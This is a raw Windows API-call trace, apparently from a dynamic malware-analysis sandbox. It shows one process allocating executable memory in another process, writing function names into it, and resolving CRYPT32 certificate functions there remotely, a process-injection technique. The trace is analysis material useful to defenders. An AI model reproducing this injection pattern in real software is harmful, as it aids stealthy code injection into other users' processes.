	[0188.175] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.175] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.175] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.175] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.176] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.176] ResetEvent (hEvent=0x478) returned 1
	[0188.176] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.176] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.176] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.176] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.177] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055350, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.177] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.177] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0188.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb70ec, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0188.177] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb70ec, cbMultiByte=-1, lpWideCharStr=0x23078c0, cchWideChar=12 | out: lpWideCharStr="CRYPT32.dll") returned 12
	[0188.177] lstrlenW (lpString="CRYPT32.dll") returned 11
	[0188.177] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.177] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x23078c0*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23078c0*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0188.178] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0188.178] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.178] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.178] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0188.178] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0188.179] ResetEvent (hEvent=0x478) returned 1
	[0188.179] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.183] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0188.183] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.183] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.183] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.183] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.183] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.184] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.184] lstrlenA (lpString="CryptExportPublicKeyInfo") returned 24
	[0188.184] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.184] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6fa0*, nSize=0x19, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6fa0*, lpNumberOfBytesWritten=0x12857c*=0x19) returned 1
	[0188.184] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.184] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.184] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.184] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.185] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.185] ResetEvent (hEvent=0x478) returned 1
	[0188.185] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.185] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.185] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.185] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.185] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.186] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005507c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.186] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.186] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.186] lstrlenA (lpString="CertNameToStrA") returned 14
	[0188.186] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.186] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6fbc*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6fbc*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0188.187] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.187] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.187] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.187] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.187] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.188] ResetEvent (hEvent=0x478) returned 1
	[0188.188] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.188] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.188] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.188] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.188] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.188] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055080, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.188] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.189] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.189] lstrlenA (lpString="CertCreateSelfSignCertificate") returned 29
	[0188.189] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.189] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6fce*, nSize=0x1e, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6fce*, lpNumberOfBytesWritten=0x12857c*=0x1e) returned 1
	[0188.189] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.189] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.189] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.189] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.190] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.190] ResetEvent (hEvent=0x478) returned 1
	[0188.190] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.190] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.190] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.190] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.190] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.191] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055084, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.191] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.191] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.191] lstrlenA (lpString="CertFreeCertificateContext") returned 26
	[0188.191] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.191] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6fee*, nSize=0x1b, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6fee*, lpNumberOfBytesWritten=0x12857c*=0x1b) returned 1
	[0188.192] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.192] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.192] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.192] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.192] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.192] ResetEvent (hEvent=0x478) returned 1
	[0188.192] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.193] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.193] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.193] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.193] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.193] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055088, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.193] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.194] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.194] lstrlenA (lpString="CryptSignAndEncodeCertificate") returned 29
	[0188.194] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.194] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb700c*, nSize=0x1e, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb700c*, lpNumberOfBytesWritten=0x12857c*=0x1e) returned 1
	[0188.194] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.194] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.194] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.194] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.195] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.195] ResetEvent (hEvent=0x478) returned 1
	[0188.195] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.195] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.195] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.195] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.195] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.195] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005508c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.196] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.196] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.196] lstrlenA (lpString="CertCloseStore") returned 14
	[0188.196] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.196] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb702c*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb702c*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0188.197] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.197] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.197] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.197] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.197] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.198] ResetEvent (hEvent=0x478) returned 1
	[0188.198] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.198] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.198] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.198] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.198] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.199] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055090, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.199] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.199] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.199] lstrlenA (lpString="CertStrToNameA") returned 14
	[0188.199] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.200] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb703e*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb703e*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0188.200] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.200] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.200] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.200] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.200] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.201] ResetEvent (hEvent=0x478) returned 1
	[0188.201] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.201] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.201] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.201] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.201] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.201] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055094, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.202] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.202] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.202] lstrlenA (lpString="CryptEncodeObject") returned 17
	[0188.202] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.202] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7050*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7050*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0188.202] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.202] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.202] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.203] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.208] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.208] ResetEvent (hEvent=0x478) returned 1
	[0188.208] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.209] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.209] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.209] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.209] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.209] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055098, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.209] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.210] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.210] lstrlenA (lpString="CertSetCertificateContextProperty") returned 33
	[0188.210] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.210] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7064*, nSize=0x22, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7064*, lpNumberOfBytesWritten=0x12857c*=0x22) returned 1
	[0188.210] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.210] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.210] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.210] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
